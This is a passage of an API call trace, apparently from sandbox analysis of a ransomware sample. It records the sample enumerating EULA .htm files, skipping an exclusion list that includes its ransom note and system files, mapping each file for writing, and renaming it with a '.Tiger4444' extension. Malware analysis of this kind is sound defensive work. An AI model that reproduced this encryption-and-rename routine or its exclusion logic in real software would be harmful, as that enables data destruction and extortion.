(lpString1="EULA_el-gr.htm", lpString2="boot") returned 1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="ids.txt") returned -1 [0043.294] lstrcmpiW (lpString1="EULA_el-gr.htm", lpString2="NTUSER.DAT") returned -1 [0043.294] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_el-gr.htm" | out: lpString1="EULA_el-gr.htm") returned="EULA_el-gr.htm" [0043.294] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm", dwFileAttributes=0x0) returned 1 [0043.295] lstrlenW (lpString="EULA_el-gr.htm") returned 14 [0043.295] lstrlenW (lpString="Tiger4444") returned 9 [0043.295] lstrcmpiW (lpString1="el-gr.htm", lpString2="Tiger4444") returned -1 [0043.295] lstrlenW (lpString=".dll") returned 4 [0043.295] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.295] lstrlenW (lpString=".lnk") returned 4 [0043.295] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.295] lstrlenW (lpString=".ini") returned 4 [0043.295] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.295] lstrlenW (lpString=".sys") returned 4 [0043.295] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.295] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.295] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.295] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13474826486) returned 1 [0043.295] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=239446) returned 1 [0043.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0043.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0043.295] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3aa60, lpName=0x0) returned 0x2c8 [0043.296] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3aa60) returned 0xbe0000 [0043.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0043.318] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0043.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.319] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0043.319] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.319] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0043.319] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13477190433) returned 1 [0043.319] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0043.319] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0043.319] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.321] CloseHandle (hObject=0x2c8) returned 1 [0043.321] CloseHandle (hObject=0x260) returned 1 [0043.325] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.Tiger4444") returned 62 [0043.325] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_el-gr.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_el-gr.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.326] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=239456 | out: Addend=0xc6f980) returned 10141824 [0043.326] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=23 | out: Addend=0xc6f98c) returned 3474 [0043.326] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d5f05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d5f05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xe4b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_en-gb.htm", cAlternateFileName="EULA_E~2.HTM")) returned 1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="Tiger4444.exe") returned -1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2=".") returned 1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="..") returned 1 [0043.326] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="windows") returned -1 [0043.327] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="bootmgr") returned 1 [0043.327] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="pagefile.sys") returned -1 [0043.327] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="boot") returned 1 [0043.327] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="ids.txt") returned -1 [0043.327] lstrcmpiW (lpString1="EULA_en-gb.htm", lpString2="NTUSER.DAT") returned -1 [0043.327] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_en-gb.htm" | out: lpString1="EULA_en-gb.htm") returned="EULA_en-gb.htm" [0043.327] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm", dwFileAttributes=0x0) returned 1 [0043.327] lstrlenW (lpString="EULA_en-gb.htm") returned 14 [0043.327] lstrlenW (lpString="Tiger4444") returned 9 [0043.327] lstrcmpiW (lpString1="en-gb.htm", lpString2="Tiger4444") returned -1 [0043.327] lstrlenW (lpString=".dll") returned 4 [0043.327] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.327] lstrlenW (lpString=".lnk") returned 4 [0043.327] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.327] lstrlenW (lpString=".ini") returned 4 [0043.327] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.327] lstrlenW (lpString=".sys") returned 4 [0043.327] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.327] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.327] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.327] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13478054842) returned 1 [0043.327] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58549) returned 1 [0043.328] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0043.328] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0043.328] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe7c0, lpName=0x0) returned 0x2c8 [0043.329] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7c0) returned 0xbe0000 [0043.331] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.331] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0043.331] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.332] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0043.332] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.332] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0043.332] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.332] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0043.332] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13478495220) returned 1 [0043.332] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0043.332] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0043.332] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.332] CloseHandle (hObject=0x2c8) returned 1 [0043.333] CloseHandle (hObject=0x260) returned 1 [0043.335] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.Tiger4444") returned 62 [0043.335] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.335] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58560 | out: Addend=0xc6f980) returned 10381280 [0043.335] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 3497 [0043.335] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d997f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d997f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xe4b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_en-us.htm", cAlternateFileName="EULA_E~3.HTM")) returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="Tiger4444.exe") returned -1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2=".") returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="..") returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="windows") returned -1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="bootmgr") returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="pagefile.sys") returned -1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="boot") returned 1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="ids.txt") returned -1 [0043.335] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="NTUSER.DAT") returned -1 [0043.336] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_en-us.htm" | out: lpString1="EULA_en-us.htm") returned="EULA_en-us.htm" [0043.336] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm", dwFileAttributes=0x0) returned 1 [0043.336] lstrlenW (lpString="EULA_en-us.htm") returned 14 [0043.336] lstrlenW (lpString="Tiger4444") returned 9 [0043.336] lstrcmpiW (lpString1="en-us.htm", lpString2="Tiger4444") returned -1 [0043.337] lstrlenW (lpString=".dll") returned 4 [0043.337] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.337] lstrlenW (lpString=".lnk") returned 4 [0043.337] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.337] lstrlenW (lpString=".ini") returned 4 [0043.337] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.337] lstrlenW (lpString=".sys") returned 4 [0043.337] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.337] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.337] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.337] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13478999796) returned 1 [0043.337] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=58549) returned 1 [0043.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0043.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0043.337] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe7c0, lpName=0x0) returned 0x2c8 [0043.339] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7c0) returned 0xbe0000 [0043.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0043.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0043.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0043.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0043.341] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13479453157) returned 1 [0043.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0043.342] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0043.342] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.342] CloseHandle (hObject=0x2c8) returned 1 [0043.342] CloseHandle (hObject=0x260) returned 1 [0043.344] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.Tiger4444") returned 62 [0043.344] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.345] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58560 | out: Addend=0xc6f980) returned 10439840 [0043.345] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 3501 [0043.345] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dad37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dad37, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x110b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_es-es.htm", cAlternateFileName="EULA_E~4.HTM")) returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="Tiger4444.exe") returned -1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2=".") returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="..") returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="windows") returned -1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="bootmgr") returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="pagefile.sys") returned -1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="boot") returned 1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="ids.txt") returned -1 [0043.345] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="NTUSER.DAT") returned -1 [0043.345] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_es-es.htm" | out: lpString1="EULA_es-es.htm") returned="EULA_es-es.htm" [0043.345] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm", dwFileAttributes=0x0) returned 1 [0043.346] lstrlenW (lpString="EULA_es-es.htm") returned 14 [0043.346] lstrlenW (lpString="Tiger4444") returned 9 [0043.346] lstrcmpiW (lpString1="es-es.htm", lpString2="Tiger4444") returned -1 [0043.346] lstrlenW (lpString=".dll") returned 4 [0043.346] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.346] lstrlenW (lpString=".lnk") returned 4 [0043.346] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.346] lstrlenW (lpString=".ini") returned 4 [0043.346] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.346] lstrlenW (lpString=".sys") returned 4 [0043.346] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.346] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.346] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.346] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13479905301) returned 1 [0043.346] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69816) returned 1 [0043.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0043.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0043.346] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113c0, lpName=0x0) returned 0x2c8 [0043.347] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113c0) returned 0xbe0000 [0043.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0043.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0043.389] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13484209498) returned 1 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0043.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0043.389] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0043.390] CloseHandle (hObject=0x2c8) returned 1 [0043.390] CloseHandle (hObject=0x260) returned 1 [0043.393] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.Tiger4444") returned 62 [0043.393] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.393] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69824 | out: Addend=0xc6f980) returned 10498400 [0043.393] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=43 | out: Addend=0xc6f98c) returned 3505 [0043.393] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dc0bd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dc0bd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x110b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_es-mx.htm", cAlternateFileName="EU6344~1.HTM")) returned 1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="Tiger4444.exe") returned -1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2=".") returned 1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="..") returned 1 [0043.393] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="windows") returned -1 [0043.394] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="bootmgr") returned 1 [0043.394] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="pagefile.sys") returned -1 [0043.394] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="boot") returned 1 [0043.394] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="ids.txt") returned -1 [0043.394] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="NTUSER.DAT") returned -1 [0043.394] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_es-mx.htm" | out: lpString1="EULA_es-mx.htm") returned="EULA_es-mx.htm" [0043.394] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm", dwFileAttributes=0x0) returned 1 [0043.394] lstrlenW (lpString="EULA_es-mx.htm") returned 14 [0043.394] lstrlenW (lpString="Tiger4444") returned 9 [0043.394] lstrcmpiW (lpString1="es-mx.htm", lpString2="Tiger4444") returned -1 [0043.394] lstrlenW (lpString=".dll") returned 4 [0043.394] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.394] lstrlenW (lpString=".lnk") returned 4 [0043.394] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.394] lstrlenW (lpString=".ini") returned 4 [0043.394] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.394] lstrlenW (lpString=".sys") returned 4 [0043.394] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.394] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.394] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.394] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13484752026) returned 1 [0043.394] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69816) returned 1 [0043.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0043.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0043.395] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113c0, lpName=0x0) returned 0x2c8 [0043.395] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113c0) returned 0xbe0000 [0043.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0043.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0043.420] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0043.420] 